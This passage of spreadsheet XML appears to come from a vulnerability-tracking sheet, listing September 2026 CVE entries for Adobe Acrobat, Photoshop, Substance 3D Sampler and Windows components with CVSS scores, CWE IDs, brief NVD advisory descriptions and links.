          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr"/>
      <c r="Q996" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R996" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="D997" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F997" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr"/>
      <c r="Q997" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R997" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="D998" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F998" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr"/>
      <c r="Q998" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R998" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="D999" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F999" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr"/>
      <c r="Q999" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R999" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="D1000" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1000" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1000" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr"/>
      <c r="Q1000" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R1000" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="D1001" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1001" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K100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001" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr"/>
      <c r="Q1001" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1001" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="D1002" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1002" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1002" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr"/>
      <c r="Q1002" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1002" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="D1003" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1003" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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3" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr"/>
      <c r="Q1003" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1003" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="D1004" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1004" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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4" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr"/>
      <c r="Q1004" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1004" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83959</t>
        </is>
      </c>
      <c r="D1005" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1005" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr"/>
      <c r="Q1005" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1005" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83959</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="D1006" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1006" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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6" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr"/>
      <c r="Q1006" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1006" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="D1007" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1007" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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7" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr"/>
      <c r="Q1007" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="R1007" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="D1008" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1008" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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8" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr"/>
      <c r="Q1008" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1008" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="D1009" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1009" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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09" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr"/>
      <c r="Q1009" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1009" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="D1010" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1010" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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0" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr"/>
      <c r="Q1010" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1010" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="D1011" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1011" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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1" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr"/>
      <c r="Q1011" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1011" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="D1012" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1012" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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2" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr"/>
      <c r="Q1012" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1012" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="D1013" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E1013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1013" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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3" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr"/>
      <c r="Q1013" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1013" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
